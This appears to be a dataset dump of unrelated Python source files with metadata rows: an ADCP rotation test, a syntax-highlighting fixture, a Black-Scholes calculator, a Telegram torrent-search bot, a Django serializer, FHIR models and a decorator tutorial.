    earth = ['_VelEast', '_VelNorth', '_VelUp1', '_VelUp2']
    # field-name suffixes for each coordinate system
    axis = {'beam': beam, 'inst': inst, 'earth': earth}
    AHRS = 'Burst_AHRSRotationMatrix'  # , 'IBurst_AHRSRotationMatrix']

    vel = {'beam': {}, 'inst': {}, 'earth': {}}
    for ky in vel.keys():
        # gather the four per-beam/per-axis components, then stack them
        # into a single (4, ...) array
        for i in range(len(axis[ky])):
            vel[ky][i] = np.transpose(getattr(d, burst+axis[ky][i]))
        vel[ky] = np.stack((vel[ky][0], vel[ky][1],
                            vel[ky][2], vel[ky][3]), axis=0)

    if AHRS in d._fieldnames:
        vel['omat'] = np.transpose(getattr(d, AHRS))
    if b5 in d._fieldnames:
        vel['b5'] = np.transpose(getattr(d, b5))
        #vel['omat5'] = getattr(d, AHRS[1])

    # bottom-track data is only present for some instruments
    if bt+beam[0] in d._fieldnames:
        vel_bt = {'beam': {}, 'inst': {}, 'earth': {}}
        for ky in vel_bt.keys():
            for i in range(len(axis[ky])):
                vel_bt[ky][i] = np.transpose(getattr(d, bt+axis[ky][i]))
            vel_bt[ky] = np.stack((vel_bt[ky][0], vel_bt[ky][1],
                                   vel_bt[ky][2], vel_bt[ky][3]), axis=0)
        return vel, vel_bt
    else:
        return vel


def rotate(axis):
    """Rotate the test datasets to `axis` and compare against Nortek's values.

    `axis` is one of 'beam', 'inst', 'earth'.  Raises AssertionError when
    dolfyn's rotation disagrees with the SignatureDeployment export beyond
    the per-instrument tolerances.
    """
    # BenchFile01.ad2cp
    td_sig = rotate2(tr.dat_sig, axis, inplace=False)
    # Sig1000_IMU.ad2cp no userdata
    td_sig_i = rotate2(tr.dat_sig_i, axis, inplace=False)
    # VelEchoBT01.ad2cp
    td_sig_ieb = rotate2(tr.dat_sig_ieb, axis, inplace=False)
    # Sig500_Echo.ad2cp
    td_sig_ie = rotate2(tr.dat_sig_ie, axis, inplace=False)

    td_sig_vel = load_nortek_matfile(base.rfnm('BenchFile01.mat'))
    td_sig_i_vel = load_nortek_matfile(base.rfnm('Sig1000_IMU.mat'))
    td_sig_ieb_vel, vel_bt = load_nortek_matfile(base.rfnm('VelEchoBT01.mat'))
    td_sig_ie_vel = load_nortek_matfile(base.rfnm('Sig500_Echo.mat'))

    # compare only the first `nens` ensembles
    nens = 100

    # ARHS inst2earth orientation matrix check
    # Checks the 1,1 element because the nortek orientmat's shape is [9,:] as
    # opposed to [3,3,:]
    if axis == 'inst':
        assert_allclose(td_sig_i.orientmat[0][0].values,
                        td_sig_i_vel['omat'][0, :nens], atol=1e-7)
        assert_allclose(td_sig_ieb.orientmat[0][0].values,
                        td_sig_ieb_vel['omat'][0, :][..., :nens], atol=1e-7)

    # 4-beam velocity (looser tolerance for AHRS-equipped instruments;
    # see the module docstring)
    assert_allclose(td_sig.vel.values,
                    td_sig_vel[axis][..., :nens], atol=1e-5)
    assert_allclose(td_sig_i.vel.values,
                    td_sig_i_vel[axis][..., :nens], atol=5e-3)
    assert_allclose(td_sig_ieb.vel.values,
                    td_sig_ieb_vel[axis][..., :nens], atol=5e-3)
    assert_allclose(td_sig_ie.vel.values,
                    td_sig_ie_vel[axis][..., :nens], atol=1e-5)

    # 5th-beam velocity (beam coordinates only)
    if axis == 'beam':
        assert_allclose(td_sig_i.vel_b5.values,
                        td_sig_i_vel['b5'][..., :nens], atol=1e-5)
        assert_allclose(td_sig_ieb.vel_b5.values,
                        td_sig_ieb_vel['b5'][..., :nens], atol=1e-5)
        assert_allclose(td_sig_ie.vel_b5.values,
                        td_sig_ie_vel['b5'][..., :nens], atol=1e-5)

    # bottom-track
    assert_allclose(td_sig_ieb.vel_bt.values,
                    vel_bt[axis][..., :nens], atol=5e-3)


def test_rotate2_beam():
    rotate('beam')


def test_rotate2_inst():
    rotate('inst')


def test_rotate2_earth():
    rotate('earth')
35.632
79
0.606646
642
4,454
3.990654
0.26324
0.052693
0.062451
0.074161
0.300156
0.233802
0.12178
0.088993
0.077283
0.056206
0
0.031147
0.250337
4,454
124
80
35.919355
0.736149
0.085317
0
0.051282
0
0
0.080245
0.006687
0
0
0
0
0.141026
1
0.064103
false
0
0.076923
0
0.166667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda2bb0b49a3956bff9896df11bb2cfb1702c6a1
1,022
py
Python
vscode/extensions/magicstack.magicpython-1.0.12/test/regexp/python2.py
nlimpid/dotfiles
b78d08707992f742f984f556fa58349c2ccd095d
[ "MIT" ]
5
2017-02-22T10:17:39.000Z
2021-04-06T16:36:13.000Z
test/regexp/python2.py
Setonas/MagicSetonas
ef76da5f27a0506b194c58072b81424e3ce985d7
[ "MIT" ]
4
2019-06-16T09:52:03.000Z
2019-08-18T02:11:35.000Z
vscode/extensions/magicstack.magicpython-1.0.12/test/regexp/python2.py
nlimpid/dotfiles
b78d08707992f742f984f556fa58349c2ccd095d
[ "MIT" ]
1
2020-08-29T02:30:52.000Z
2020-08-29T02:30:52.000Z
a = r' (?x) foo ' a : source.python : source.python = : keyword.operator.assignment.python, source.python : source.python r : source.python, storage.type.string.python, string.regexp.quoted.single.python ' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python : invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python : source.python ( : punctuation.parenthesis.begin.python, source.python ? : invalid.illegal.operator.python, source.python x : source.python ) : punctuation.parenthesis.end.python, source.python : source.python foo : source.python ' : punctuation.definition.string.begin.python, source.python, string.quoted.docstring.single.python : invalid.illegal.newline.python, source.python, string.quoted.docstring.single.python
42.583333
112
0.622309
103
1,022
6.174757
0.23301
0.301887
0.339623
0.150943
0.638365
0.544025
0.496855
0.496855
0.374214
0
0
0
0.272994
1,022
23
113
44.434783
0.855989
0
0
0.2
0
0.1
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
3
bda33f238048fa796ed848c9125688fdcab82f49
1,331
py
Python
backend/flaskr/formula.py
jyyang42/RobinOptionCalculator
be3f06f6ae54c7e2dd4badc258a9888e3e240a4a
[ "MIT" ]
1
2020-11-19T19:47:48.000Z
2020-11-19T19:47:48.000Z
backend/flaskr/formula.py
jyyang42/RobinOptionCalculater
be3f06f6ae54c7e2dd4badc258a9888e3e240a4a
[ "MIT" ]
7
2020-06-23T07:07:10.000Z
2020-08-24T23:43:53.000Z
backend/flaskr/formula.py
jyyang42/RobinOptionCalculater
be3f06f6ae54c7e2dd4badc258a9888e3e240a4a
[ "MIT" ]
2
2020-08-25T02:45:10.000Z
2020-11-19T19:47:38.000Z
import math


def get_d1(p0, X, t, sigma, Rho):
    """Return the Black-Scholes d1 term.

    Args:
        p0: current stock price (worked example: 62).
        X: exercise (strike) price (worked example: 60).
        t: time to expiration in days; scaled by /365 internally (example: 40).
        sigma: annualized volatility (example: 0.32).
        Rho: risk-free rate (example: 0.04).

    Worked example:
        d1 = {ln(62/60) + [0.04 + 0.5 * 0.32 ^ 2] * (40/365)}
             / (0.32 * sqrt(40/365))
    """
    a = math.log(p0 / X) + (Rho + 0.5 * sigma * sigma) * (t / 365)
    # BUG FIX: the denominator previously used the hard-coded example value
    # sqrt(40/365); it must scale with the actual time to expiration t,
    # matching the sqrt(t/365) used in get_d2.
    b = sigma * math.sqrt(t / 365)
    return a / b


def get_d2(d1, sigma, t):
    """Return d2 = d1 - sigma * sqrt(t/365)."""
    return d1 - sigma * math.sqrt(t / 365)


def get_cumulative_standard_normal_distribution(d):
    """Return the standard normal CDF N(d) via the error function."""
    return 0.5 * (1 + math.erf(d / math.sqrt(2)))


def get_call(p0, Nd1, X, Krf, t, Nd2):
    """Return the call value: p0*N(d1) - X*exp(-Krf*t/365)*N(d2)."""
    a = p0 * Nd1
    # discount the strike back to present value (math.exp replaces the
    # equivalent math.pow(math.e, ...) form)
    b = X / math.exp(Krf * t / 365)
    return a - b * Nd2


def get_put(Vc, X, Krf, t, p0):
    """Return the put value via put-call parity: Vc + X*exp(-Krf*t/365) - p0."""
    return Vc + X / math.exp(Krf * t / 365) - p0


if __name__ == "__main__":
    # Z = (x - µ) / sigma
    # Worked example matching the comments in get_d1.
    p0 = 62
    X = 60
    t = 40
    sigma = 0.32
    Rho = 0.04
    d1 = get_d1(p0, X, t, sigma, Rho)
    d2 = get_d2(d1, sigma, t)
    Nd1 = get_cumulative_standard_normal_distribution(d1)
    Nd2 = get_cumulative_standard_normal_distribution(d2)
    Vc = get_call(p0, Nd1, X, Rho, t, Nd2)
    Vp = get_put(Vc, X, Rho, t, p0)
    print("d1:", d1)
    print("d2:", d2)
    print("Nd1:", Nd1)
    print("Nd2:", Nd2)
    print("Vc:", Vc)
    print("Vp:", Vp)
25.596154
81
0.552968
235
1,331
3.012766
0.251064
0.042373
0.088983
0.114407
0.34322
0.10452
0.10452
0.056497
0
0
0
0.123958
0.278738
1,331
52
82
25.596154
0.613542
0.180316
0
0
0
0
0.025854
0
0
0
0
0
0
1
0.151515
false
0
0.030303
0.090909
0.333333
0.181818
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda34ec056c93e4918c1bc75e8154a348bc2e5e2
932
py
Python
bot/modules/magnet.py
AliAryanTech/Nyaa-Telegram-Bot
d1614ed218fd9f413d046eec61978df269b325b6
[ "MIT" ]
12
2020-12-01T04:40:37.000Z
2022-01-22T14:19:04.000Z
bot/modules/magnet.py
AliAryanTech/Nyaa-Telegram-Bot
d1614ed218fd9f413d046eec61978df269b325b6
[ "MIT" ]
null
null
null
bot/modules/magnet.py
AliAryanTech/Nyaa-Telegram-Bot
d1614ed218fd9f413d046eec61978df269b325b6
[ "MIT" ]
19
2021-02-09T19:20:59.000Z
2022-03-18T12:05:08.000Z
from .get_response import nyaa_id, sukebei_id
from bot import NYAA, botname
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery

# Reply used when the command does not carry exactly one argument.
INVALID_TEXT = """
No ID found!
"""


@NYAA.on_message(filters.command(["magnet", f"magnet@{botname}"], prefixes="/")
                 & ~filters.edited)
async def get_magnet(client, message):
    """Handle ``/magnet <id>``: ask the user which tracker to search.

    Replies with INVALID_TEXT when the command does not have exactly one
    argument; otherwise sends an inline keyboard (Nyaa / Sukebei) whose
    callback data embeds the requested torrent id.
    """
    query = message.text.split(maxsplit=2)
    # "/magnet <id>" must split into exactly two tokens; anything else
    # (no id, or trailing extra text) is rejected.  Equivalent to the
    # former "< 2 or > 2" pair of comparisons.
    if len(query) != 2:
        await NYAA.send_message(chat_id=message.chat.id, text=INVALID_TEXT)
        return
    buttons = [
        [
            InlineKeyboardButton("Nyaa", f"nyaa {query[-1]}"),
            InlineKeyboardButton("Sukebei", f"sukebei {query[-1]}")
        ]
    ]
    await NYAA.send_message(chat_id=message.chat.id,
                            text="Where do you wanna search?",
                            reply_markup=InlineKeyboardMarkup(buttons))
40.521739
137
0.637339
107
932
5.439252
0.457944
0.075601
0.089347
0.068729
0.147766
0.147766
0.147766
0.147766
0.147766
0.147766
0
0.007102
0.244635
932
23
137
40.521739
0.819602
0
0
0
0
0
0.119649
0
0
0
0
0
0
1
0
false
0
0.2
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda3f5b55352390d17d7c5c49807550e4e3deac1
297
py
Python
factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/images/api/serializers.py
kaka-lin/azure-intelligent-edge-patterns
766833c7c25d2458cec697937be288202d1763bc
[ "MIT" ]
176
2019-07-03T00:20:15.000Z
2022-03-14T07:51:22.000Z
factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/images/api/serializers.py
kaka-lin/azure-intelligent-edge-patterns
766833c7c25d2458cec697937be288202d1763bc
[ "MIT" ]
121
2019-06-24T20:47:27.000Z
2022-03-28T02:16:18.000Z
factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/images/api/serializers.py
kaka-lin/azure-intelligent-edge-patterns
766833c7c25d2458cec697937be288202d1763bc
[ "MIT" ]
144
2019-06-18T18:48:43.000Z
2022-03-31T12:14:46.000Z
"""App API serializers.

Declares the Django REST Framework serializer for the images API.
"""
import logging

from rest_framework import serializers

from ..models import Image

# Module-level logger; not referenced in this module itself (kept,
# presumably for parity with sibling API modules — confirm before removing).
logger = logging.getLogger(__name__)


class ImageSerializer(serializers.ModelSerializer):
    """ImageSerializer.

    Model-backed serializer exposing every field of Image ("__all__"),
    so newly added model fields are serialized automatically.
    """

    class Meta:
        model = Image
        fields = "__all__"
15.631579
51
0.703704
29
297
6.896552
0.689655
0
0
0
0
0
0
0
0
0
0
0
0.198653
297
18
52
16.5
0.840336
0.124579
0
0
0
0
0.028226
0
0
0
0
0
0
1
0
false
0
0.375
0
0.625
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
bda4133fe40f05627ed065666e33a64ba888ab8f
18,060
py
Python
fhir/resources/DSTU2/implementationguide.py
cstoltze/fhir.resources
52f99738935b7313089d89daf94d73ce7d167c9d
[ "BSD-3-Clause" ]
144
2019-05-08T14:24:43.000Z
2022-03-30T02:37:11.000Z
fhir/resources/DSTU2/implementationguide.py
cstoltze/fhir.resources
52f99738935b7313089d89daf94d73ce7d167c9d
[ "BSD-3-Clause" ]
82
2019-05-13T17:43:13.000Z
2022-03-30T16:45:17.000Z
fhir/resources/DSTU2/implementationguide.py
cstoltze/fhir.resources
52f99738935b7313089d89daf94d73ce7d167c9d
[ "BSD-3-Clause" ]
48
2019-04-04T14:14:53.000Z
2022-03-30T06:07:31.000Z
# -*- coding: utf-8 -*-
"""
Profile: https://www.hl7.org/fhir/DSTU2/implementationguide.html
Release: DSTU2
Version: 1.0.2
Revision: 7202

Pydantic models for the DSTU2 ImplementationGuide resource and its
backbone elements.  Field metadata (alias/title/description) mirrors the
FHIR specification; `enum_values` / `enum_reference_types` extras are
informational hooks, not enforced validation (see the inline notes).
"""
from typing import Any, Dict
from typing import List as ListType

from pydantic import Field, root_validator

from . import backboneelement, domainresource, fhirtypes


class ImplementationGuide(domainresource.DomainResource):
    """A set of rules about how FHIR is used.

    A set of rules of how a particular interoperability or standards problem is
    solved - typically through the use of FHIR resources. This resource is used
    to gather all the parts of an implementation guide into a logical whole and
    to publish a computable definition of all the parts.
    """

    resource_type = Field("ImplementationGuide", const=True)

    binary: ListType[fhirtypes.Uri] = Field(
        None,
        alias="binary",
        title="List of `uri` items.",
        description="Image, css, script, etc..",
    )

    contact: ListType[fhirtypes.ImplementationGuideContactType] = Field(
        None,
        alias="contact",
        title="Contact details for the publisher",
        description=(
            "Contact details to assist a user in finding and communicating with the"
            " publisher."
        ),
    )

    copyright: fhirtypes.String = Field(
        None,
        alias="copyright",
        title="Use and/or publishing restrictions",
        description=(
            "A copyright statement relating to the implementation guide and/or its "
            "contents. Copyright statements are generally legal restrictions on the"
            " use and publishing of the implementation guide."
        ),
    )

    date: fhirtypes.DateTime = Field(
        None,
        alias="date",
        title="Date last changed",
        description=(
            "The date (and optionally time) when the implementation guide was "
            "published. The date must change when the business version changes and "
            "it must change if the status code changes. In addition, it should "
            "change when the substantive content of the implementation guide "
            "changes."
        ),
    )

    dependency: ListType[fhirtypes.ImplementationGuideDependencyType] = Field(
        None,
        alias="dependency",
        title="Another Implementation guide this depends on",
        description=(
            "Another implementation guide that this implementation depends on. "
            "Typically, an implementation guide uses value sets, profiles "
            "etc.defined in other implementation guides."
        ),
    )

    description: fhirtypes.String = Field(
        None,
        alias="description",
        title="Natural language description of the implementation guide",
        description=(
            "A free text natural language description of the implementation guide "
            "from a consumer's perspective."
        ),
    )

    experimental: fhirtypes.Boolean = Field(
        None,
        alias="experimental",
        title="For testing purposes, not real usage",
        description=(
            "A Boolean value to indicate that this implementation guide is authored"
            " for testing purposes (or education/evaluation/marketing) and is not "
            "intended to be used for genuine usage."
        ),
    )

    fhirVersion: fhirtypes.Id = Field(
        None,
        alias="fhirVersion",
        title="FHIR Version this Implementation Guide targets",
        description=(
            "The version(s) of the FHIR specification that this ImplementationGuide"
            " targets - e.g. describes how to use. The value of this element is the"
            " formal version of the specification, without the revision number, "
            "e.g. [publication].[major].[minor], which is 4.0.1. for this version."
        ),
    )

    # "global" is a Python keyword, so the attribute is global_fhir while the
    # FHIR wire name is restored via the alias.
    global_fhir: ListType[fhirtypes.ImplementationGuideGlobalType] = Field(
        None,
        alias="global",
        title="Profiles that apply globally",
        description=(
            "A set of profiles that all resources covered by this implementation "
            "guide must conform to."
        ),
    )

    name: fhirtypes.String = Field(
        ...,
        alias="name",
        title="Name for this implementation guide (computer friendly)",
        description=(
            "A natural language name identifying the implementation guide. This "
            "name should be usable as an identifier for the module by machine "
            "processing applications such as code generation."
        ),
    )

    package: ListType[fhirtypes.ImplementationGuidePackageType] = Field(
        ...,
        alias="package",
        title="List of `ImplementationGuidePackage` items (represented as `dict` in JSON).",
        description="Group of resources as used in .page.package.",
    )

    page: fhirtypes.ImplementationGuidePageType = Field(
        ...,
        alias="page",
        title="Type `ImplementationGuidePage` (represented as `dict` in JSON).",
        description="Page/Section in the Guide.",
    )

    publisher: fhirtypes.String = Field(
        None,
        alias="publisher",
        title="Name of the publisher (organization or individual)",
        description=(
            "The name of the organization or individual that published the "
            "implementation guide."
        ),
    )

    status: fhirtypes.Code = Field(
        ...,
        alias="status",
        title="draft | active | retired",
        description=(
            "The status of this implementation guide. Enables tracking the life-"
            "cycle of the content."
        ),
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=["draft", "active", "retired"],
    )

    url: fhirtypes.Uri = Field(
        ...,
        alias="url",
        title=(
            "Canonical identifier for this implementation guide, represented as a "
            "URI (globally unique)"
        ),
        description=(
            "An absolute URI that is used to identify this implementation guide "
            "when it is referenced in a specification, model, design or an "
            "instance; also called its canonical identifier. This SHOULD be "
            "globally unique and SHOULD be a literal address at which at which an "
            "authoritative instance of this implementation guide is (or will be) "
            "published. This URL can be the target of a canonical reference. It "
            "SHALL remain the same when the implementation guide is stored on "
            "different servers."
        ),
    )

    useContext: ListType[fhirtypes.CodeableConceptType] = Field(
        None,
        alias="useContext",
        title="The context that the content is intended to support",
        description=(
            "The content was developed with a focus and intent of supporting the "
            "contexts that are listed. These contexts may be general categories "
            "(gender, age, ...) or may be references to specific programs "
            "(insurance plans, studies, ...) and may be used to assist with "
            "indexing and searching for appropriate implementation guide instances."
        ),
    )

    version: fhirtypes.String = Field(
        None,
        alias="version",
        title="Business version of the implementation guide",
        description=(
            "The identifier that is used to identify this version of the "
            "implementation guide when it is referenced in a specification, model, "
            "design or instance. This is an arbitrary value managed by the "
            "implementation guide author and is not expected to be globally unique."
            " For example, it might be a timestamp (e.g. yyyymmdd) if a managed "
            "version is not available. There is also no expectation that versions "
            "can be placed in a lexicographical sequence."
        ),
    )


class ImplementationGuideContact(backboneelement.BackboneElement):
    """Contact details of the publisher.

    Contacts to assist a user in finding and communicating with the publisher.
    """

    resource_type = Field("ImplementationGuideContact", const=True)

    name: fhirtypes.String = Field(
        None,
        alias="name",
        title="Type `str`.",
        description="Name of a individual to contact.",
    )

    telecom: ListType[fhirtypes.ContactPointType] = Field(
        None,
        alias="telecom",
        title="List of `ContactPoint` items (represented as `dict` in JSON).",
        description="Contact details for individual or publisher.",
    )


class ImplementationGuideDependency(backboneelement.BackboneElement):
    """Another Implementation guide this depends on.

    Another implementation guide that this implementation depends on.
    Typically, an implementation guide uses value sets, profiles etc.defined in
    other implementation guides.
    """

    # NOTE(review): the const value "ImplementationGuideDependsOn" does not
    # match this class's name (ImplementationGuideDependency, the DSTU2
    # element) — it looks copied from the R4 element name; confirm against
    # the rest of the package before changing.
    resource_type = Field("ImplementationGuideDependsOn", const=True)

    type: fhirtypes.Code = Field(
        ...,
        alias="type",
        title="Type `str`.",
        description="reference | inclusion.",
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=["reference", "inclusion"],
    )

    uri: fhirtypes.Uri = Field(
        ...,
        alias="uri",
        title="Identity of the IG that this depends on",
        description="A canonical reference to the Implementation guide for the dependency.",
    )


class ImplementationGuideGlobal(backboneelement.BackboneElement):
    """Profiles that apply globally.

    A set of profiles that all resources covered by this implementation guide
    must conform to.
    """

    resource_type = Field("ImplementationGuideGlobal", const=True)

    profile: fhirtypes.ReferenceType = Field(
        ...,
        alias="profile",
        title="Profile that all resources must conform to",
        description="A reference to the profile that all instances must conform to.",
        # note: Listed Resource Type(s) should be allowed as Reference.
        enum_reference_types=["StructureDefinition"],
    )

    type: fhirtypes.Code = Field(
        ...,
        alias="type",
        title="Type this profile applies to",
        description="The type of resource that all instances must conform to.",
    )


class ImplementationGuidePackage(backboneelement.BackboneElement):
    """Group of resources as used in .page.package.

    A logical group of resources. Logical groups can be used when building
    pages.
    """

    resource_type = Field("ImplementationGuidePackage", const=True)

    description: fhirtypes.String = Field(
        None,
        alias="description",
        title="Type `str`.",
        description="Human readable text describing the package.",
    )

    name: fhirtypes.String = Field(
        ...,
        alias="name",
        title="Type `str`.",
        description="Name used .page.package.",
    )

    resource: ListType[fhirtypes.ImplementationGuidePackageResourceType] = Field(
        ...,
        alias="resource",
        title=(
            "List of `ImplementationGuidePackageResource` items (represented as `dict` "
            "in JSON)."
        ),
        description="Resource in the implementation guide.",
    )


class ImplementationGuidePackageResource(backboneelement.BackboneElement):
    """Resource in the implementation guide.

    A resource that is part of the implementation guide. Conformance resources
    (value set, structure definition, conformance statements etc.) are obvious
    candidates for inclusion, but any kind of resource can be included as an
    example resource.
    """

    resource_type = Field("ImplementationGuidePackageResource", const=True)

    acronym: fhirtypes.String = Field(
        None,
        alias="acronym",
        title="Type `str`.",
        description="Short code to identify the resource.",
    )

    description: fhirtypes.String = Field(
        None,
        alias="description",
        title="Type `str`.",
        description="Reason why included in guide.",
    )

    exampleFor: fhirtypes.ReferenceType = Field(
        None,
        alias="exampleFor",
        title=(
            "Type `Reference` referencing `StructureDefinition` (represented as `dict` "
            "in JSON)."
        ),
        description="Resource this is an example of (if applicable).",
        # note: Listed Resource Type(s) should be allowed as Reference.
        enum_reference_types=["StructureDefinition"],
    )

    name: fhirtypes.String = Field(
        None,
        alias="name",
        title="Type `str`.",
        description="Human Name for the resource.",
    )

    purpose: fhirtypes.Code = Field(
        ...,
        alias="purpose",
        title="Type `str`.",
        description=(
            "example | terminology | profile | extension | dictionary | logical."
        ),
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=[
            "example",
            "terminology",
            "profile",
            "extension",
            "dictionary",
            "logical",
        ],
    )

    # sourceReference / sourceUri form the choice element source[x]:
    # exactly one of the two must be populated (see validate_one_of_many).
    sourceReference: fhirtypes.ReferenceType = Field(
        None,
        alias="sourceReference",
        title="Type `Reference` referencing `Resource` (represented as `dict` in JSON).",
        description="Location of the resource.",
        # Choice of Data Types. i.e timing[x]
        one_of_many="source",
        one_of_many_required=True,
        # note: Listed Resource Type(s) should be allowed as Reference.
        enum_reference_types=["Resource"],
    )

    sourceUri: fhirtypes.Uri = Field(
        None,
        alias="sourceUri",
        title="Type `str`.",
        description="Location of the resource.",
        # Choice of Data Types. i.e timing[x]
        one_of_many="source",
        one_of_many_required=True,
    )

    @root_validator(pre=True)
    def validate_one_of_many(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        """https://www.hl7.org/fhir/formats.html#choice
        A few elements have a choice of more than one data type for their content.
        All such elements have a name that takes the form nnn[x].
        The "nnn" part of the name is constant, and the "[x]" is replaced with
        the title-cased name of the type that is actually used.
        The table view shows each of these names explicitly.

        Elements that have a choice of data type cannot repeat - they must
        have a maximum cardinality of 1. When constructing an instance of an
        element with a choice of types, the authoring system must create a single
        element with a data type chosen from among the list of permitted data types.
        """
        # Maps each choice-element prefix to its concrete typed field names.
        one_of_many_fields = {
            "source": ["sourceReference", "sourceUri"],
        }
        for prefix, fields in one_of_many_fields.items():
            assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
            required = (
                cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
                is True
            )
            found = False
            for field in fields:
                if field in values and values[field] is not None:
                    if found is True:
                        # more than one variant of the choice was supplied
                        raise ValueError(
                            "Any of one field value is expected from "
                            f"this list {fields}, but got multiple!"
                        )
                    else:
                        found = True
            if required is True and found is False:
                raise ValueError(f"Expect any of field value from this list {fields}.")

        return values


class ImplementationGuidePage(backboneelement.BackboneElement):
    """Page/Section in the Guide.

    A page / section in the implementation guide. The root page is the
    implementation guide home page.
    """

    resource_type = Field("ImplementationGuidePage", const=True)

    format: fhirtypes.Code = Field(
        None,
        alias="format",
        title="Type `str`.",
        description="Format of the page (e.g. html, markdown, etc.).",
    )

    kind: fhirtypes.Code = Field(
        ...,
        alias="kind",
        title="Type `str`.",
        description=(
            "page | example | list | include | directory | dictionary | toc | resource."
        ),
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=[
            "page",
            "example",
            "list",
            "include",
            "directory",
            "dictionary",
            "toc",
            "resource",
        ],
    )

    name: fhirtypes.String = Field(
        ...,
        alias="name",
        title="Type `str`.",
        description="Short name shown for navigational assistance.",
    )

    package: ListType[fhirtypes.String] = Field(
        None,
        alias="package",
        title="List of `str` items.",
        description="Name of package to include.",
    )

    # Recursive element: pages may nest sub-pages of the same type.
    page: ListType[fhirtypes.ImplementationGuidePageType] = Field(
        None,
        alias="page",
        title=(
            "List of `ImplementationGuidePage` items (represented as `dict` in JSON)."
        ),
        description="Nested Pages / Sections.",
    )

    source: fhirtypes.Uri = Field(
        ...,
        alias="source",
        title="Type `Uri`.",
        description="Where to find that page.",
    )

    type: ListType[fhirtypes.Code] = Field(
        None,
        alias="type",
        title="List of `Code` items.",
        description="Kind of resource to include in the list.",
    )
34.334601
92
0.612901
1,916
18,060
5.748956
0.216597
0.060372
0.031775
0.025057
0.326464
0.271448
0.240309
0.208352
0.180209
0.180209
0
0.001418
0.297176
18,060
525
93
34.4
0.866383
0.155371
0
0.347044
0
0.002571
0.416461
0.023859
0
0
0
0
0.002571
1
0.002571
false
0
0.010283
0
0.154242
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda5541d8519516c1c651c498c62fb368ec8e19e
2,796
py
Python
Decorator Foundation.py
Enthuisasticpessimist/Small-exercise
b169000023c3863f9e30d2cfc7c0f6e228f612f7
[ "MIT" ]
null
null
null
Decorator Foundation.py
Enthuisasticpessimist/Small-exercise
b169000023c3863f9e30d2cfc7c0f6e228f612f7
[ "MIT" ]
null
null
null
Decorator Foundation.py
Enthuisasticpessimist/Small-exercise
b169000023c3863f9e30d2cfc7c0f6e228f612f7
[ "MIT" ]
null
null
null
# Teaching script: three progressively more general decorator patterns.
# The first two stages are kept commented out for reference; only the
# multi-layer (parameterized) decorator at the bottom is live.
#
# NOTE: importing this module has side effects — the final webpage1('111')
# call runs at import time and prompts for input() until the correct
# name/password ('a' / '1') is entered.

##-----------Non parametric decorator----------------
####initialization
##name = 'a'
##password = '1'
##user_status = False
##
####decorator
##def login(func):
##    def inner():
##        global name,password,user_status
##        if user_status == True:
##            pass
##        else:
##            n = input('name:')
##            p = input('password:')
##            if n == name and p == password:
##                user_status = True
##        if user_status:
##            func()
##    return inner
##
##@login
##def webpage1():
##    print('webpage---1')
##@login
##def webpage2():
##    print('webpage---2')
##
####webpage1 = login(webpage1)##original method1
####webpage2 = login(webpage2)##original method2
##webpage1()
##webpage2()
##-----------Non parametric decorator----------------

####-----------Parametric decorator--------------------
####initialization
##name = 'a'
##password = '1'
##user_status = False
##
####decorator
##def login(func):
##    def inner(*args,**kwargs):##arbitrary parameters can be passed in
##        global name,password,user_status
##        if user_status == True:
##            pass
##        else:
##            n = input('name:')
##            p = input('password:')
##            if n == name and p == password:
##                user_status = True
##        if user_status:
##            func(*args,**kwargs)##arbitrary parameters can be passed in
##    return inner
##
##@login
##def webpage1(arg):
##    print('webpage---1',arg)
##@login
##def webpage2():
##    print('webpage---2')
##
####webpage1 = login(webpage1)##original method1
####webpage2 = login(webpage2)##original method2
##webpage1('111')
##webpage2()
####-----------Parametric decorator--------------------

##-----------Multi-layer decorator--------------------
##initialization
# Module-level login state shared by all decorated pages.
name = 'a'
password = '1'
user_status = False

##decorator
# login(auth_type) -> outer(func) -> inner(...): the extra layer lets the
# decorator itself take an argument (the authentication backend name).
def login(auth_type):
    def outer(func):
        def inner(*args,**kwargs):##arbitrary parameters can be passed in
            global name,password,user_status
            # only the 'qq' backend is implemented; anything else is rejected
            if auth_type == 'qq':
                if user_status == True:
                    pass
                else:
                    # prompt until credentials match the module-level state
                    n = input('name:')
                    p = input('password:')
                    if n == name and p == password:
                        user_status = True
                if user_status:
                    func(*args,**kwargs)##arbitrary parameters can be passed in
            else:
                print('auth_type is wrong!')
        return inner
    return outer

@login('qq')
def webpage1(arg):
    print('webpage---1',arg)

@login('weixin')
def webpage2():
    print('webpage---2')

##temp = login("qq")##original method1
##webpage1 = temp(webpage1)
webpage1('111')
##-----------Multi-layer decorator--------------------
26.377358
79
0.508941
279
